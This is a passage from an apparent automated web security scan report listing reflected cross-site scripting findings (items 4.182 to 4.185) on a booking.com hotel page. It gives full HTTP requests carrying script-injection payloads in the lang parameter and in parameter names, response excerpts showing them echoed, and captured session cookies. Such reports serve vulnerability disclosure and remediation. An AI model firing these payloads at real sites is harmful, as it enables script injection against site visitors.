<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
us',
"b_fb_id" : 'FB_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554fddd2</script><script>alert(1)</script>fcb6fa376ec&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang
...[SNIP]...

4.182. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dabd9</script><script>alert(1)</script>c4e3a42ad78 was submitted in the lang parameter. This input was echoed unmodified in the application's response. The response is a 404 error page (the b_this_url value in the excerpt points at /error404.en-us.html), but the error page still echoes the full request URL into the b_original_url string, so the injection fires even though the requested page is not found.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=endabd9</script><script>alert(1)</script>c4e3a42ad78 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:34 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YT0ShudbNrGVPaDSzvXFe4xbht5lFgMyVAQm0%2BrKYWrAruXQOLMfCI2HIOoK64mzxHU2LtZgl19yBQo2%2BxipIgwUyVCsEw61ZHIPe1uGDbXdXqljeH%2Bi0I9T%2BJh7HRJ5ltjenueABovvaNd1jkgQXe7MsVu6Q97TdnZFlV9wxiy%2FnJvqwhZ2fts6smQSmVceJ3Gl9SkCDmvzmu3keOUHThunvdYTOWweoHF29EwDbsBDYGqY8b8PqU0BYumexYRegqvMFGCnkEaATpWHxGraVlu0KWN24VWvTOF9UxOhVbaFjcl3GZx4empOFKnu5lFkZz46akS%2FJet8tMHnXOYCb5VjYdjRYYFf3Eg6Fde0NnEYOU95fg3S%2Bu1iLI9cDKtXjeqQoz7Sa%2FiiB9%2BWcqonU4DhgyMzT4TR3RV8ZfB4DaT89b8fPsv9i0wTGa%2Bs3HHHhlVKkyk37hzDHIS4gyXK3ZPjbOIVH6%2FtchT1Y%2FD2eqgztbu8mPRrVs%2BiiFxuKrAJUEfZtd7XevU%2B2JZi7NBhSu4m6LpurXzaq0RJb5v8qsX7YZbdx%2F4%2FeuYrADP2vtiTCpS3EmTvK6LL8gsImxEYRAHbP2jNbZtpvlVCBr%2BTXWvTNkbF5aaak%2BBK2Fsk5ZS3BOF5UHxG6AVQjZVNG9rF%2BsBz%2B%2FNCX0%2BX1iVsx4BXNPW94c0wB9eKUlR5X63iq%2BBZdE9xY7kybvgpOSz3Iyflqkkd5IgoVR%2BrEJNhtyHgcXLy3JlP5oQmzE5iJVgXXY3eTuxylnPj90ak3TVnIzYbQ5drsNiKSMbiBhS%2Bnyy2eC7QRvxpe4EUp8V8D7RyWqOtkRol7gMbKWEg97d6yswh%2FU%2BgTMS5L3APHy0iOe%2BNqbw8kAQ01H405Bq7R0ftE8bSm9KPrkOg2zWt6dbVQ1IHDMBewd24d4s2E9epYEx2D7aRtvoOMuINtxxDIs8yZBh6oLMaSc7jwZ8cNBqL2Q%2F783%2FCnGcipNNoOui8erWbJ4i3aHggy4PJx7hatbUrjlwVStI9DlMZcn3uI81p9GGH8CxtwBfq732BRkhm%2BG7NXviPFZujQl%2BUJPBGl%2BZWNFHY%2BF1rAERYRJkacOxjvY0lTU%2FPZq4Y%2BJOiSswadh7kzMP9Ba5KxU85F4vEXJLAnniootXZ1yvhdq7%2FPq3YUvc1GIyb0K5uaOeojn5RNcry1czvCvzCdcYvJ99YIW1wjQIp7qj9zudCHwfwcLYa3ZgAF9PHQdWPuc4J2J5bISG8ww05H4I09f7VTyNKqCJSGAhbxSkjPDg36B8D8mcxlQ6gvp1VhIR3UwcxwuRhfXMn%2F%2FqH57QkzUSRh%2B%2BhwWl%2BK1M9j%2BDqf4QQRslBQgHgaBNQPAThR4%2Fsg9ik%2FK%2BQ9Aaox8wtncVUsaU6E8qVG%2B33oDFOJ59vT3Wu4o5b; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:34 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55496
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
m_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=endabd9</script><script>alert(1)</script>c4e3a42ad78',
b_this_url : '/error404.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101',

"setvar_affiliate_is_bookings2" : 1,


transl_close_x : 'close',
transl_close_calendar:
...[SNIP]...

4.183. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dfe"><script>alert(1)</script>faaef80a365 was submitted in the lang parameter. This input was echoed unmodified in the application's response. As in 4.182, the server answers 404 Not Found for this request, but the error page echoes the request URL into a double-quoted attribute value, so the reflection is reachable regardless.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en68dfe"><script>alert(1)</script>faaef80a365 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXKL1ATovZy06Br3gSlD7BzBu3eTMil8Y%2FCy4jbYosmGhqGZu8JcPFESWI09oW8zlInDyaExFuTRDduuckwUzZ6gH7VDYQiy%2Fx2maGo3L3ZYSpa00GGRwhRQnWkdPnpvjabILpFxS5R3pCwbKDjikQjblcdWTy3nemV3VYA23%2BJb%2BbgUsaDmQObOurpPRSh1kNfzWpRIp4PN7eB%2Bsgl0L01n%2FXIisIRgkf2am8SKzMQLJDNeNvlEbU8zBIB5216Iass2D5UD4G4tr0hU3D%2Fvu4NPNNgVKfrUTYkTVOrhWHKD9zx7sp036Ih1l3IaEmrRpgpW1mObFvF6mI8TGX0lhxx80vXSXnJR23zgVYT0UrU7QW%2Frji2DEXXWfEU765KoY6igkm%2Bpw5NCp1zkSl7UaF%2BQvANUP%2B3kcXfdcptqFVlZbLt2mTObgg6KLvAJKM3QgV640uGhRqe6BpwnH68O04kw1Q5wruMeyQO9xYyTskwfK3IEZ2lDLVOmJ%2BJMwu%2BcwzhyESnh%2B29jW3IpkV%2BwdZXmZmKW2AEKpLBmPapNjMx0TC6n78t3sfRoUY4f5ZkV3hDvBDp8kb5ef9DTnFGL66JxzBefURBqD3thxnGPv3g4F4LYLvcFyphz5YXJi1mXoFzRPux7oNJp2P0yGDYj4Ydhrh2FHKU64oxs6s0p99tdNA9YcivDlWiBji4moIMXQZ2LXHrf5v1hVTFCqrTMXJuPk2dCvbGtCp7MqbKCLYoMNZ4zbTKfAJ9qYGJzXL9NjjgDr42zZsOazNDtoFMeNmURAxyGiyilkLgICx9RwWke1VyAQ04zo2zH%2BljUtyOIG6RxuotrY%2F48%2FAXu35GIPgdwSZ4IvQlzx7xDgABlhnAcYf6W9AbqTg8Q0zQKkOKFY5MMkmpYdWEwv37f%2BXFThGUgRo8xW11tSFFZ9IZFuqVadWZ4eM9XTuK%2F3xxhF1AIFw3x0YTa8Z0CRhiGH08O%2FOREGSS6ix1yGIRcsBMDgyDX06T9%2BC%2BN251Mb4iUNpWflWeKZXZbRPOjqoE0TWugJyL93CbFI3OUm0MZO3Iew9KeaBKbxlRCYWsa0J1cWYpritDWZvZdn3JWY5WhVYz7cDL4%2FEOpzd5B8IAlFaQGn3SRbIEihCOiWab%2F5SmEM8h0tOaI4NuOtMmpkGiHhu%2BSQp2SkYI%2FNtONltD37VFCEt343X14UptsnwFO3UkL5idhEi3abuEFUir7vxoklLQSjII2zGYSgSTmb2IPiwuKrKM81FiulwQDtppYFVNGGoq4XrnEY%2Fu%2FsjvBKreWW6y2S2fJC5kvnV3NwkF5icyc%2FlVFMMPMVza5XT68mb7zCwGvBaTlUVxeTPSCn7Y0hTmjW89cNHKRw6332K4hz2qV%2FwDcYUKZi2yytna0uP%2BmaWgp%2F2KSra%2BLWEM6Nqqivy6jjVw%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:14 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55483
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
m_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en68dfe"><script>alert(1)</script>faaef80a365">
...[SNIP]...

4.184. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e603a"><script>alert(1)</script>4178c1e27b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en&e603a"><script>alert(1)</script>4178c1e27b3=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:16:37 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2G71SGaRMBvID57Yanw9uScUOt940TVeeaUgqpS1YShC4kjKNg57XijsKAC2j2mwWCKDGStgBC6sTjB3%2FWgfEM87EKWcRIJyqg0GEKabkj9CEJEyWm04nb9QB%2BQ84LCo7LgTfGOHW7BiixkUqVZAydOmJ1X8u4P5PXNBllvMUdAPeuPsD%2B8lnVUNG3trDLVacg0NzPDp27DiAsrAttvm6a%2BVrBtOS6LZZ%2F5jRj%2BdtGwRN1k9R8PWj%2Fm47Mz3uilEy1jl4sZvvApowYkUymolIit0e8S6zt8yNjVHZql7jwEJN%2FJOXf3HaA7Y71wtiPNPFlVAu%2Bm55r4A%2FxyfLargsHl%2BsHVpzGdL1osyPN7t7enDzwE7hs2PvqTyD72vu2ah2tgYhoZQ0ZQVumaIHfeyUB%2Fp2hjdMRBtoDvfoei%2BuJzbvGsgYsGU0pVIp0Ofg5WXmVDub3Zc3tMFq4nEx8y3OepEoByBFm3CJAB7HTbSOEfSGS2AlYi3OPjpwU1iNblWEnUrMvHO%2BiOi2rqvgNHKQWixtu4LttcQnPtSr84YM3Wnn9kxiJLAW6g%2B3RtALfxU4%2BB2Bou%2FvyeMTDC%2Bggu%2FfI%2FhsBlsiQ40BEkdZkUAOA8eEbGBtTeKW2vx2PXG%2BCYrM3mQdB4gctyHXkS8WnJ%2F%2BaRmm7Sx3ytJ%2FzAafSldVeHoXDlneYtnEXkmQE32nYXgvhkRShU3Z97KIlGwpmjnkSFrawo2DWkRnhtZHzv%2FlHJ7nx4iNBLh0Uc8EJnpC3vINgBoBpFdiYOXh8HWtd%2BN2H9KK1Rb4dgioB0WAOOAj13oIFGI1opQHkaOgoPfbIUVjJaypGYt8bzUVRoG6QSABR6aNBSwSJWJNaBOX5orB2Jm9cM7cPoSBdwCJM%2Fk6qKkN1UZwnYd94G94jWlDqZCKC1j73hq50xRI9A0KGDjYpeSqBfiVP9bGqmr88R2g9nw5t%2Bt58rBjAoNqXbsbi2MgRpUEh%2FQd%2BjSwxCLzwTPmI66zdKa%2BMPhDnwgSnOir%2BkcB%2FAfgh82SRIQ6PmkODAfEe71TTzSuxXL89G5LMx6wT6xS0dQQl0wXKbZDLJn%2FhTpHiFy9STiLwsTluT8Ca%2FqgMbAiSQZpxQQkmCqSmBVuW%2F%2BHnXYqBn9r8hdapx804KeW6PompL5kh4Mwg12M2djKzxPB5lyezdJtQ72xKwYlrIPlFvly8zq4OQk6AFFeWxUVwzC9LXxIAyVQdjh4aQk%2BIzoHz65zInWf87fi%2B1HOBtAxlSVPiavKSYc%2BnuTgT7AbcAm0xSpdL4uAB1ReZOESgCQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:38 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232687
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?e603a"><script>alert(1)</script>4178c1e27b3=1;utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554" />
...[SNIP]...

4.185. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c610'%3balert(1)//55af9cf3306 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c610';alert(1)//55af9cf3306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en&4c610'%3balert(1)//55af9cf3306=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7i